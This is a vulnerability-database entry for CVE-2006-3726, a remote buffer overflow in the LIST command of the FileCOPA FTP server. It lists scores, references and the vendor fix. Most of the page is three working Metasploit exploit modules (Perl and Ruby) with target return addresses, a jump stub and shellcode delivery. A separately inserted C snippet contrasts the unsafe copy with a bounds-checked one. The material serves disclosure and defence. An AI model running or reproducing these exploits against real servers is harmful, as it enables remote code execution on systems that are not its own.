CVE-2006-3726
CVSS 6.5
Published: 2006-07-21 10:03:00
Revised: 2011-03-07 21:39:21

[Original] Buffer overflow in FileCOPA FTP Server before 1.01, released on 18th July 2006, allows remote authenticated attackers to execute arbitrary code via a long argument to the LIST command.


[CNNVD] Intervations FileCopa LIST Command Remote Buffer Overflow Vulnerability (CNNVD-200607-332)

        FileCopa is an automated FTP server product.
        FileCopa FTP Server contains a buffer overflow vulnerability in its handling of user requests; a remote attacker may exploit it to execute arbitrary instructions on the server.
        If an attacker can successfully log in to the FTP server (anonymous access is allowed by default) and submit a malformed, malicious LIST command, arbitrary code execution can result.

- CVSS (base score)

CVSS score: 6.5 [Medium (MEDIUM)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3726
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3726
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-332
(Official data source) CNNVD

- Other links and resources

http://secunia.com/advisories/21108
(VENDOR_ADVISORY)  SECUNIA  21108
http://xforce.iss.net/xforce/xfdb/27817
(UNKNOWN)  XF  filecopa-list-bo(27817)
http://www.vupen.com/english/advisories/2006/2870
(UNKNOWN)  VUPEN  ADV-2006-2870
http://www.osvdb.org/27389
(UNKNOWN)  OSVDB  27389
http://www.appsec.ch/docs/2006-07-19-fileCopa.txt
(VENDOR_ADVISORY)  MISC  http://www.appsec.ch/docs/2006-07-19-fileCopa.txt
http://www.securityfocus.com/bid/19065
(UNKNOWN)  BID  19065

- Vulnerability information

Intervations FileCopa LIST Command Remote Buffer Overflow Vulnerability
Medium severity  Buffer overflow
2006-07-21 00:00:00 2006-08-28 00:00:00
Remote

- Advisory and patch

        The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:
        http://www.filecopa.com/

- Vulnerability information (3107)

FileCOPA FTP Server <= 1.01 (LIST) Remote BoF Exploit (meta) (EDBID:3107)
windows remote
2007-01-09 Verified
21 Jacopo Cervini
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::filecopa_list;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };
my $info =
  {
	'Name'    => 'FileCopa FTP Server pre 18 Jul Version',
	'Version' => '$Revision: 0.1 $',
	'Authors' =>
	  [ 
		'Jacopo Cervini <acaro [at] jervus.it>'
	  ],

	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'win2000', 'winxp', 'win2003' ],
	'Priv'  => 0,

	'AutoOpts'  => { 'EXITFUNC' => 'thread' },
	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 21],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
		'USER'  => [1, 'DATA', 'Username', 'test'],
		'PASS'  => [1, 'DATA', 'Password', 'test'],
	  },

	'Payload' =>
	  {
		'Space'  => 400,
		'BadChars'  => "\x00\x0a\x0d",
		# 'Prepend'	=> "\x81\xc4\x54\xf2\xff\xff",	# add esp, -3500
		'Keys' 		=> ['+ws2ord'],
	  },

	'Description'  =>  Pex::Text::Freeform(qq{
        This module exploits the buffer overflow found in the LIST command
        in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch.    
}),

	'Refs'  =>
	  [
		['BID', '19065'],
		
	  ],

	'DefaultTarget' => 0,
	'Targets' =>
	  [

		['Windows 2000 SP4 English',	160, 0x7c2e7993 ], # jmp esp in ADVAPI32.dll
		['Windows 2000 SP4 Italian',	160, 0x79277993 ], # jmp esp in ADVAPI32.dll
		['Windows XP SP2 English',	240, 0x77df2740 ], # jmp esp in ADVAPI32.dll
		
		

	  ],

	'Keys' => ['filecopa'],

	'DisclosureDate' => 'Jul 19 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}


sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target      = $self->Targets->[$target_idx];

	my $jmp = "\x66\x81\xc1\xa0\x01\x51\xc3";

	#66:81C1 A001   ADD CX,1A0
	#51             PUSH ECX
	#C3             RETN

	my $pattern = ("A" x $target->[1]);
	$pattern .= pack('V', $target->[2]);
	$pattern .= ("\x90" x 4);
	$pattern .= $jmp;
	$pattern .= ("\x90" x 283);
	$pattern .= $shellcode;

	my $request = "A " . $pattern . "\r\n";

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	my $r = $s->RecvLineMulti(20);
	if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
	$self->Print($r);

	$s->Send("USER " . $self->GetVar('USER') . "\r\n");
	$r = $s->RecvLineMulti(20);
	if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
	$self->Print($r);


	$s->Send("PASS ".$self->GetVar('PASS')."\r\n");
	$r = $s->RecvLineMulti(20);
	if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
	$self->Print($r);

	$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using jmp esp at 0x%.8x...", $target->[2]));


	$s->Send("LIST $request");
	
	sleep(2);
	return;
}

# milw0rm.com [2007-01-09]
		

- Vulnerability information (16733)

FileCopa FTP Server pre 18 Jul Version (EDBID:16733)
windows remote
2010-04-30 Verified
21 metasploit
##
# $Id: filecopa_list_overflow.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'FileCopa FTP Server pre 18 Jul Version',
			'Description'    => %q{
					This module exploits the buffer overflow found in the LIST command
				in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch
			},
			'Author'         => [ 'Jacopo Cervini' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2006-3726' ],
					[ 'OSVDB', '27389' ],
					[ 'BID', '19065' ],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',

			'Targets'        =>
				[
					[ 'Windows 2k Server SP4 English',   { 'Ret' => 0x7c2e7993, 'Nops' => 160 } ], # jmp esp
					[ 'Windows XP Pro SP2 Italian',      { 'Ret' => 0x77f62740, 'Nops' => 240 } ]  # jmp esp
				],
			'DisclosureDate' => 'Jul 19 2006',
			'DefaultTarget' => 0))
	end


	def exploit
		connect_login

		print_status("Trying target #{target.name}...")

		sploit =  "A "
		sploit << make_nops(target['Nops'])
		sploit << [target.ret].pack('V') + make_nops(4) + "\x66\x81\xc1\xa0\x01\x51\xc3" + make_nops(189) + payload.encoded

		send_cmd( ['LIST', sploit] , false)

		handler
		disconnect
	end

end
		

- Vulnerability information (F83114)

FileCopa FTP Server pre 18 Jul Version (PacketStormID:F83114)
2009-11-26 00:00:00
Jacopo Cervini  metasploit.com
exploit,overflow
CVE-2006-3726

This Metasploit module exploits the buffer overflow found in the LIST command in fileCOPA FTP server pre 18 Jul 2006 version, discovered by www.appsec.ch.

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'FileCopa FTP Server pre 18 Jul Version',
			'Description'    => %q{
				This module exploits the buffer overflow found in the LIST command
        in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch
			},
			'Author'         => [ 'Jacopo Cervini' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2006-3726' ],
					[ 'OSVDB', '27389' ],
					[ 'BID', '19065' ],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',

			'Targets'        => 
				[
					[ 'Windows 2k Server SP4 English',   { 'Ret' => 0x7c2e7993, 'Nops' => 160 } ], # jmp esp
					[ 'Windows XP Pro SP2 Italian',      { 'Ret' => 0x77f62740, 'Nops' => 240 } ]  # jmp esp
				],
			'DisclosureDate' => 'Jul 19 2006',
			'DefaultTarget' => 0))
	end

	
	def exploit
		connect_login

		print_status("Trying target #{target.name}...")

		sploit =  "A "
		sploit << make_nops(target['Nops'])
		sploit << [target.ret].pack('V') + make_nops(4) + "\x66\x81\xc1\xa0\x01\x51\xc3" + make_nops(189) + payload.encoded 

		send_cmd( ['LIST', sploit] , false)

		handler
		disconnect
	end

end
    

- Vulnerability information

27389
FileCOPA FTP Server LIST Command Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public, Exploit Commercial

- Vulnerability description

A remote or local overflow exists in FileCOPA FTP server. The server fails to handle a long (approximately 350 bytes) parameter to the LIST command, resulting in a buffer overflow. With a specially crafted LIST command, an attacker can cause a denial of service or possibly execute arbitrary code.
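As an added illustration of the bug class the description refers to (this is not FileCOPA's code and does not come from any of the advisories listed here), the unbounded-copy handler pattern beside a bounded version; the 256-byte buffer size and the handler names are assumptions:

```c
#include <stdio.h>
#include <string.h>

/* Added illustration of the bug class described above, not FileCOPA's
 * code. The buffer size (256) is an assumption; the advisory only says
 * a LIST argument of roughly 350 bytes triggers the overflow. */
#define LIST_ARG_MAX 256

/* Vulnerable pattern: the client-controlled LIST argument is copied
 * into a fixed-size stack buffer with no length check, so anything
 * longer than LIST_ARG_MAX overwrites adjacent stack data (saved
 * registers, return address). Shown for contrast only; not exercised. */
void list_handler_vulnerable(const char *arg) {
    char path[LIST_ARG_MAX];
    strcpy(path, arg);
    printf("listing %s\n", path);
}

/* Hardened form: validate the length before copying and copy with an
 * explicit bound. Returns 0 on success, -1 when the argument would not
 * fit (the server should answer "501 Syntax error" and stop there). */
int list_handler_safe(const char *arg, char *out, size_t out_len) {
    /* look for the terminator only inside the space we actually have */
    const char *nul = memchr(arg, '\0', out_len);
    if (nul == NULL)
        return -1;                  /* over-long: reject, do not copy */
    memcpy(out, arg, (size_t)(nul - arg) + 1);
    return 0;
}

/* Drives the safe handler with a normal argument. Returns 0 if the
 * argument was accepted and copied intact. */
int demo_short_list(void) {
    char out[LIST_ARG_MAX];
    if (list_handler_safe("/pub/incoming", out, sizeof out) != 0)
        return 1;
    return strcmp(out, "/pub/incoming") == 0 ? 0 : 2;
}

/* Drives the safe handler with a constructed 350-byte argument, the
 * size the advisory describes. Returns -1 when correctly rejected. */
int demo_long_list(void) {
    char arg[351];
    char out[LIST_ARG_MAX];
    memset(arg, 'A', 350);
    arg[350] = '\0';
    return list_handler_safe(arg, out, sizeof out);
}
```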

- Timeline

2006-07-19 2006-07-17
Unknown Unknown

- Solution

Upgrade to version 1.01 (2006-07-18) or higher, as it has been reported to fix this vulnerability. Note that this flaw was fixed in the 2006-07-18 release without a change in version number. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

 

 
